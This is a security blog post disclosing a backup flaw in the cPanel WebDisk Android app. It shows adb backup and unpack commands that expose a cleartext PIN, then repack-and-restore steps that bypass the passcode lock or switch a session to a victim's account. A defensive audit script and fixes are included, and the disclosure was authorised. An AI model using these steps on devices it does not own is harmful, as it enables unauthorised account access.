Friday 29 June 2018

Backup Vulnerability Exploitation

cPanel WebDisk Android App 4.0 : Backup Vulnerability

Hello folks,

This vulnerability concerns Insecure Data Storage and a Security Misconfiguration, which can be exploited through the Android backup functionality.

We all know that many mobile applications store user credentials or other sensitive data on the device itself in clear text, which is not good practice.

But many of us also know that accessing that data normally requires root privileges or some special condition such as debugging being enabled. So even if a mobile application stores sensitive data in clear text, it is often not treated as an issue: many security teams and bug bounty programs specifically exclude vulnerabilities that require a rooted or jailbroken device to exploit.

But what happens if this data is accessible to a normal user? Yes, no root privilege required.

So let's look at the conditions I found in cPanel WebDisk Android App 4.0 which lead to a PassCode security bypass.

First, below was my test environment:
App Name & Version = cPanel WebDisk Android Application Version 4.0
Tested On = Android 5.0 (non-rooted device + rooted)

The cPanel WebDisk Android Application has functionality to set a PIN code to prevent unauthorised access. It can be found under Application > Settings > Passcode Lock (shown in the screenshot below).

After enabling it, the cPanel WebDisk Android Application will ask you for the PassCode every time you exit the application.

Vulnerability Details:

In Android there is a property called "Backup" which allows an application to be backed up by another application or by itself. This property is declared in AndroidManifest.xml, e.g. allowBackup="true".

So if AndroidManifest.xml contains allowBackup="true", the application can be backed up. This is the case in the cPanel WebDisk Android App.

First I backed up the application using adb backup <androidpackage> -f <outfile.ab>:

adb backup net.cpanel.webdisk -f disk.ab

After executing this command your device will ask you to confirm the backup, as shown below. Tap "Back up my data".

This created a file called "disk.ab". Next I converted the backup file into a tar archive using the command:

java -jar abe.jar unpack disk.ab disk.tar

(If you are using a Windows machine, run cmd.exe as Administrator.)

This command created a tar file (disk.tar), which I then extracted with:

tar xvf disk.tar

This created a new folder called "apps" which contains the whole backup of the cPanel WebDisk Android App.

Finally I moved to the "/apps/net.cpanel.webdisk/sp" folder and found a file "net.cpanel.webdisk_preferences.xml" which contains the PassCode value, which was "1337".

Using this PassCode I was able to get to the dashboard of the application.
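The two conditions described above (a manifest that permits backup, and a shared_prefs file that holds the passcode in clear text) are easy to check for in an automated way. The following is an added example, not code from the original post and not cPanel's code: it parses a manifest for allowBackup, re-implements the unencrypted unpack step that abe.jar performs, and scans the restored sp/ XML files for keys that look like passcodes or tokens stored in the clear. The .ab header layout it relies on (four newline-terminated lines: "ANDROID BACKUP", a version number, a compression flag, an encryption algorithm, then the tar stream) is an assumption stated here, not something the post describes, and the sample backup it builds is constructed for the demonstration.

```python
"""Audit an Android 'adb backup' (.ab) file for cleartext secrets.

Added example (not from the original post, not cPanel's code).
Assumed .ab layout: "ANDROID BACKUP\n<version>\n<compressed 0|1>\n<none|AES-256>\n"
followed by a (possibly zlib-deflated) tar stream.
"""
import io
import re
import tarfile
import xml.etree.ElementTree as ET
import zlib

ANDROID_NS = "http://schemas.android.com/apk/res/android"
# Preference keys that should never hold a cleartext value.
SENSITIVE_KEY = re.compile(r"(pin|passcode|password|token|secret)", re.I)


def manifest_allows_backup(manifest_xml: str) -> bool:
    """True if the <application> element permits adb backup.

    android:allowBackup defaults to true when the attribute is absent,
    so a missing attribute is as risky as an explicit "true".
    """
    root = ET.fromstring(manifest_xml)
    app = root.find("application")
    if app is None:
        return True
    value = app.get(f"{{{ANDROID_NS}}}allowBackup", "true")
    return value.strip().lower() == "true"


def unpack_ab(ab_bytes: bytes) -> tarfile.TarFile:
    """Turn an unencrypted .ab file into a readable TarFile (what abe.jar unpack does)."""
    parts = ab_bytes.split(b"\n", 4)
    if len(parts) < 5 or parts[0] != b"ANDROID BACKUP":
        raise ValueError("not an Android backup file")
    _magic, _version, compressed, encryption, payload = parts
    if encryption != b"none":
        # Password-protected backups need the user's backup password first.
        raise ValueError(f"encrypted backup ({encryption.decode()}): password required")
    if compressed == b"1":
        payload = zlib.decompress(payload)
    return tarfile.open(fileobj=io.BytesIO(payload), mode="r:")


def scan_shared_prefs(tar: tarfile.TarFile) -> list[tuple[str, str, str]]:
    """Return (archive path, key, value) for suspicious cleartext entries under sp/."""
    findings = []
    for member in tar.getmembers():
        if not member.isfile() or "/sp/" not in member.name:
            continue
        data = tar.extractfile(member).read()
        try:
            root = ET.fromstring(data)
        except ET.ParseError:
            continue  # not a SharedPreferences XML map
        for elem in root:
            key = elem.get("name", "")
            # Strings are stored as element text; ints/booleans use a value attribute.
            value = elem.get("value")
            if value is None:
                value = (elem.text or "").strip()
            if SENSITIVE_KEY.search(key) and value:
                findings.append((member.name, key, value))
    return findings


def build_sample_ab() -> bytes:
    """Constructed sample: a compressed, unencrypted backup of one hypothetical app."""
    prefs = (b'<?xml version="1.0" encoding="utf-8" standalone="yes" ?>\n'
             b"<map>\n"
             b'    <string name="pinCode">1337</string>\n'
             b'    <int name="failedAttempts" value="0" />\n'
             b'    <string name="theme">dark</string>\n'
             b"</map>\n")
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:") as tar:
        info = tarfile.TarInfo("apps/com.example.app/sp/com.example.app_preferences.xml")
        info.size = len(prefs)
        tar.addfile(info, io.BytesIO(prefs))
    return b"ANDROID BACKUP\n5\n1\nnone\n" + zlib.compress(buf.getvalue())


if __name__ == "__main__":
    for path, key, value in scan_shared_prefs(unpack_ab(build_sample_ab())):
        print(f"cleartext secret: {path} -> {key} = {value}")
```

Point unpack_ab at a real .ab file (open(path, "rb").read()) to audit an application you own. The fix on the application side is twofold: set android:allowBackup="false" (or exclude the preferences file with backup rules) so the data never leaves the sandbox, and store the passcode as a salted hash rather than a recoverable value, so that even a leaked preferences file does not reveal it.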

POC Video 

You can download this version of the APK from here to reproduce the issue:

Little Interesting Points
In this scenario the PIN code was saved in clear text, so you can simply enter it in the application. But what happens if the PIN code is stored in encrypted form?

1) In that case you can remove the whole PIN code block, or replace the value with any garbage value; and if you are able to reverse the application, take a quick look at the encryption technique being used and replace the pincode value in the preferences.xml file with your own, then save it. Now you have an XML file without a PIN lock code value. Then perform the steps below:

2) tar -tf disk.tar > disk.list
3) star -c -v -f disk_new.tar -no-dirslash list=disk.list
4) java -jar abe.jar pack disk_new.tar disk_new.ab
5) adb restore disk_new.ab (this command prompts on your device to restore the backup for that application)

In these 5 steps we have simply removed the PIN code block from the XML, re-packed it as an Android backup file and finally restored that backup onto the device. Now if all works well you will get access to the application dashboard/home screen without being prompted for any PassCode.

Sometimes the backup also exposes the API access token and other interesting data of the user, in case the application is protected by some authentication lock functionality. You can then obtain the API access token and make calls on behalf of the user.

One scenario I encountered was an application that authenticated the user against a database in internal storage. Once we backed up the application and looked into the DB file, we found some session management data. To verify my suspicion we simply changed the username value to the victim's username and restored the backup.
Once the device was restarted, we accessed the application and found ourselves in the victim's account.

As we can see, there are tons of scenarios where this functionality can be exploited.

Permission was taken from the cPanel Security Team for public disclosure.

Comments are always welcome. 
